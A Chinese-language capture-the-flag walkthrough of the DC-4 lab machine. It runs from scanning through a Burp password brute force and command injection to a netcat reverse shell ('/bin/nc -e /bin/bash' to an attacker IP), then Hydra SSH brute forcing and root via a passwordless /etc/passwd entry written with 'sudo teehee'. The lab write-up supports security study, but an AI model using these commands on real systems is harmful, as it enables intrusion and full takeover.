DC系列 DC:4

DC:4 靶机

文章目录

信息收集

IP端口收集

用arp-scan + 网段锁定ip

nmap对端口服务进行详细扫描nmap -p- -sV 10.4.7.23

发现开启着http服务和22端口

网页信息收集

网站信息收集

进入网站后发现是个登录页面

输入弱口令登录发现没反应

尝试扫描子目录

bash 复制代码
gobuster dir -r -u http://10.4.7.23/  -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x .html,.php

但是访问每个子目录会发现都会重定向到该页面

bp爆破

没其他有用信息我们尝试密码爆破打开bp拦截访问网页随便输入一个账户密码

打开bp发现抓到了数据包

我们发到攻击模块选择狙击手模式给密码添加标记

添加payload就选择简单列表就好添加好自己的密码字典开启爆破

得到了密码是happy

反弹shell

nc反弹

进行登录

发现有一个命令点击一下跳转到了另一个网页

上面显示我们可以执行命令我们跑一下

发现显示出了目录抓一下包将包放到重放模块

我们看到执行的是ls -l命令中间空格使用+号代替 尝试用这个执行nc反弹并将+代替所有空格/bin/nc+-e+/bin/bash+10.4.7.3+10002

kali开启nc监听之后放包

成功反弹进入

内网信息收集

收集jim用户的密码

sudo -l 显示没有此命令查找二进制文件

bash 复制代码
find / -perm -u=s -type f 2>/dev/null

看到这个文件拥有suid权限我们将/bin/bash写入并执行

发现失败另寻他法

在jim的家目录下发现历史密码

密码爆破

将他全部密码复制到kali上生成密码字典对jim进行ssh爆破
hydra -l jim -P key.txt ssh://10.4.7.23 -f -Vv -t 10

成功爆破出密码jibril04我们进行ssh登录

Charles用户密码收集

登陆成功显示我们有一份邮件查看一下显示是Charles发来的说密码是^xHhA&hvim0y

我们尝试登录一下发现是Charles的密码

提权

teehee提权

使用sudo -l查看权限

发现无条件执行teehee直接进行提权echo "xl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

切换xl用户发现已经是root了

查看旗帜

备注

teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

复制代码
echo "xl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户,这个用户因为uid为0,所以也是root权限

相关推荐
shenyan~39 分钟前
关于 验证码系统 详解
网络安全
凉拌青瓜哈3 小时前
DVWA-LOW级-SQL手工注入漏洞测试(MySQL数据库)+sqlmap自动化注入-小白必看(超详细)
mysql·安全·网络安全
学习溢出7 小时前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
安胜ANSCEN7 小时前
还在靠防火墙硬抗?网络安全需要从“单点防御“转向“系统化防护“!
网络安全·应急响应·威胁检测
鹿鸣天涯7 小时前
《红蓝攻防:构建实战化网络安全防御体系》
安全·web安全
Bruce_Liuxiaowei15 小时前
dict协议在网络安全中的应用与风险分析
网络·安全·web安全·伪协议
FreeBuf_16 小时前
蓝牙协议栈高危漏洞曝光,攻击可入侵奔驰、大众和斯柯达车载娱乐系统
安全·web安全·娱乐
浩浩测试一下1 天前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构
周某人姓周1 天前
搭建渗透测试环境
网络安全·网络攻击模型
码农12138号1 天前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf